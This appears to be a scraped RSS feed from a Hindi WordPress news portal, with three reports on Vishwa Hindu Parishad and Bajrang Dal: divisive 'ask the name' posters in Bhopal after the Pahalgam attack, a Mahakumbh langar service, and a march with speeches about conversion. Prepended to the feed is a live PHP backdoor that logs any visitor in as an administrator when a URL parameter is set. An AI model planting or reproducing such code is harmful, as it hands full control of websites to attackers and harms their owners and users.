// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Vishwa Hindu Parishad – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 30 Apr 2025 15:36:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 भोपाल में विश्व हिंदू परिषद और बजरंग दल ने लगाए विवादित पोस्टर, लिखा है ‘अब तो नाम पूछना ही पड़ेगा’ https://pratyushaashakinayikiran.com/?p=152829 Wed, 30 Apr 2025 15:36:00 +0000 https://pratyushaashakinayikiran.com/?p=152829 भोपाल

दक्षिण कश्मीर के पहलगाम में हुए आतंकी हमले का विरोध देश भर में हो रहा है. इस बीच मध्य प्रदेश की राजधानी भोपाल में हिन्दू संगठनों ने कुछ ऐसे पोस्टर और बैनर लगा दिए हैं, जो विवादित हैं. विश्व हिन्दू परिषद और बजरंग दल ने भोपाल में जो पोस्टर लगाए हैं, उनपर लिखा है- 'अब तो नाम पूछना पड़ेगा'.

दरअसल, पहलगाम आतंकी हमले में धर्म पूछकर और कलमा पढ़ाकर निर्दोष लोगों को मारने की बात सामने आई थी. 26 लोगों को उनका धर्म पूछकर तब मार दिया गया, जब वे कलमा नहीं पढ़ सके. इसको लेकर भोपाल में भी आक्रोश जारी है. इस बीच भोपाल में लगे पोस्टर्स पर लिखा गया है- 'आदत डालिए नाम पूछने की, बच्चों के सुरक्षित भविष्य के लिए अब तो नाम पूछना ही पड़ेगा.'

भोपाल की सड़कों और चौराहों पर लगे इन पोस्टर्स के जरिए विश्व हिंदू परिषद और बजरंग दल ने आक्रोश जताया है. इस पोस्टर पर करनाल के विनय नरवाल और उनकी पत्नी की वह तस्वीर छपी है, जिसे देखकर सभी दहशत में आ गए थे. पहलगाम में जब आतंकियों ने विनय नरवाल को गोली मार दी थी और उनकी पत्नी उनके बगल में बैठी थीं, वह तस्वीर हिन्दू संगठनों ने अपने पोस्टर के लिए इस्तेमाल की है.

भोपाल बंद का हुआ था आह्वान
कश्मीर के पहलगाम में हुए आतंकी हमले के बाद भोपाल में 26 तारीख को विरोध दर्ज करते हुए भोपाल बंद का आह्वान किया गया था. शनिवार को आधे दिन के लिए बाजार बंद रखा गया था और सड़कों पर सन्नाटा पसरा था. केवल आवश्यक सेवाएं ही जारी थीं.

इससे पहले दिवाली पर भी बजरंग दल ने एक विवादित पोस्टर लगाया था जिसमें लिखा था कि त्योहार का सामान हिन्दू भाइयों से ही खरीदें. 'अपना त्योहार अपनों से व्यवहार' टैगलाइन देकर बजरंग दल ने पोस्टर पर लिखा था कि दीपावली का सामना उन्हीं से खरीदें जो आपकी खरीदी से दीपावली मना सकें.

]]>
महाकुंभ VHP में विशेष लंगर सेवा चलाएगी, प्रतिदिन 15,000 श्रद्धालु उठाएंगे लाभ https://pratyushaashakinayikiran.com/?p=114706 Sat, 28 Dec 2024 09:09:00 +0000 https://pratyushaashakinayikiran.com/?p=114706  महाकुंभ नगर
मकर संक्रांति से लेकर महाशिवरात्रि तक आयोजित होने वाले महाकुंभ मेले में एक विशेष लंगर सेवा का आयोजन किया जाएगा। यह सेवा विश्व हिंदू परिषद (VHP) के विदर्भ प्रांत की ओर से संचालित की जाएगी, जो श्रद्धालुओं और साधु-संतों के लिए भोजन उपलब्ध कराएगी। विश्व हिंदू परिषद द्वारा साधु-संतों के लिए निवास की व्यवस्था की जाएगी और वहीं पर यह लंगर सेवा चलाई जाएगी।

लंगर सेवा की टाइमिंग?

इस सेवा का मुख्य उद्देश्य महाकुंभ में आए श्रद्धालुओं को बिन मांगे भोजन देना और उनके धार्मिक कर्तव्यों में सहयोग करना है। महाकुंभ मेला 13 जनवरी से 27 फरवरी तक चलेगा। इस दौरान रोजाना सुबह 10:00 बजे से रात 10:00 बजे तक यह लंगर सेवा चलती रहेगी। यह सेवा विश्व हिंदू परिषद के सेवा विभाग, धर्माचार्य संपर्क विभाग और मंदिर अर्चक पुरोहित आयाम विदर्भ प्रांत की ओर से संचालित की जाएगी।

15,000 श्रद्धालुओं के लिए इंतजाम

इस सेवा का लाभ प्रतिदिन करीब 15,000 श्रद्धालु उठाएंगे। कुंभ मेले में आने वाले साधु-संतों को विशेष सम्मान के साथ चौरंग और पाटे पर बैठाकर भोजन कराया जाएगा। यह सेवा उन लाखों श्रद्धालुओं के लिए महत्वपूर्ण है जो हर साल इस महाकुंभ में भाग लेने के लिए दूर-दूर से आते हैं।

अयोध्या की तर्ज पर प्रयागराज में

इससे पहले 2023 में अयोध्या में श्रीराम जन्मभूमि मंदिर प्राण प्रतिष्ठा समारोह के दौरान भी विश्व हिंदू परिषद के विदर्भ प्रांत ने एक महीने तक लंगर सेवा का आयोजन किया था, जिसमें लगभग 20 लाख श्रद्धालुओं को भोजन उपलब्ध कराया गया था। प्रयागराज में यह सेवा उसी तर्ज पर चलाए जाने की योजना है।

भोजन सामग्री दान करने की अपील

महाकुंभ मेला हिंदू धर्म का एक महत्वपूर्ण और पवित्र आयोजन है, जो हर 12 साल में एक बार आयोजित होता है। इस मेले में करोड़ों श्रद्धालु अपने पुण्य लाभ के लिए डुबकी लगाते हैं। महाकुंभ मेले में इस बार लगभग 35 करोड़ श्रद्धालुओं के शामिल होने का अनुमान है। विश्व हिंदू परिषद ने महाकुंभ के आयोजन के दौरान श्रद्धालुओं से आह्वान किया है कि वे इस पुण्य अवसर पर अनाज और अन्य भोजन सामग्री दान करें।

]]>
छत्तीसगढ़-बलरामपुर रामानुजगंज में विश्व हिंदू परिषद और बजरंग दल का शौर्य संचलन, गांधी मैदान तक उमड़ा जन सैलाब https://pratyushaashakinayikiran.com/?p=113325 Tue, 24 Dec 2024 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=113325 बलरामपुर रामानुजगंज।

बलरामपुर रामानुजगंज विश्व हिंदू परिषद एवं बजरंग दल के द्वारा के द्वारा नगर में शौर्य संचलन का बृहद आयोजन अंतर्राष्ट्रीय कथावाचक सतानंद जी महाराज विश्व हिंदू परिषद के प्रांतीय कार्यकारी अध्यक्ष चंद्रशेखर वर्मा के विशेष उपस्थिति में आयोजित किया गया। नगर में पहली बार आयोजित करें बजरंग दल के शौर्य संचलन कार्यक्रम को लेकर विश्व हिंदू परिषद एवं बजरंग दल के लोगों में उत्साह देखते  बन रहा था।

बड़ी संख्या में नगरवासी भी आयोजन में सम्मिलित हुए। मां महामाया मंदिर परिसर से शौर्य संचलन प्रारंभ हुआ जो नगर के प्रमुख चौक चौराहे होते गांधी मैदान में समाप्त हुआ। गांधी मैदान में बौद्धिक को संबोधित करते हुए चंद्रशेखर वर्मा ने कहा कि हिंदू समाज विश्व का कल्याण हो, प्राणियों में सद्भावना हो, सभी सुखी रहे, सभी स्वस्थ हो की भावना से कार्य करता है। आज सनातन धर्म को लेकर अनर्गल प्रलाप लोगों के द्वारा किया जा रहा है हम सनातनियों को एकजुट होने की आवश्यकता है। अखंड भारत से टूट कर कई देश बने वे देश सिर्फ इसलिए बने कि वह हिंदू अल्पसंख्यक में आए। हिंदू समाज को बांटने का षड्यंत्र हो रहा है धर्मांतरण तेजी से हो रहा है। इस सब को रोकने के लिए हम सबको एकजुट होना होगा। विश्व हिंदू परिषद विभाग समरसता प्रमुख ललन कुशवाहा,विश्व हिंदू परिषद के जिला अध्यक्ष अभिषेक मिश्रा, बजरंग दल के जिला संयोजक जस्सू केसरी के नेतृत्व में विगत एक माह से शौर्य संचलन को लेकर व्यापक की समय तैयारी की जारी थी।

राम भक्तों की टोली रही आकर्षण का केंद्र
शौर्य संचलन श्रीकोट से आए सैकड़ो राम भक्तों की टोली आकर्षण का केंद्र रहा।परंपरागत वाद्य यंत्र त्रिशूल तलवार हाथ भगवा झंडा लेकर  सम्मिलित हुवे। बजरंग दल के कार्यकर्ता भी एक प्रकार के गणवेश में सम्मिलित हुए। सभी में अनुशासन देखते बन रहा था। शौर्य संचलन नगर के प्रमुख चौक चौराहे से होकर गुजरी लोगों में उत्साह देखते बन उसे वर्ष के साथ शौर्य संचलन का स्वागत किया गया। विश्व हिंदू परिषद एवं बजरंग दल के कार्यकर्ताओं के द्वारा हाथ में दंड एवं अस्त्र शस्त्र लेकर शौर्य संचलन निकाला गया।

भाव बिभोर हुए सभी
गांधी मैदान में अंतर्राष्ट्रीय कथावाचक सतानंद महाराज की ओजस्वी वाणी से सभी भाव विभोर हो गए। अपनी माटी संस्कृति धर्म के लिए हम सबको जागरूक होना होगा। राष्ट्र को उत्कर्ष की ओर ले जाने के लिए हम सबको आगे आना होगा। विश्व में सबसे अधिक युवा भारत वर्ष में है। आवश्यकता है बस उन्हें सही दिशा दिखाने की।धर्मांतरण को लेकर जोरदार तरीके से अपनी बात रखी।

]]>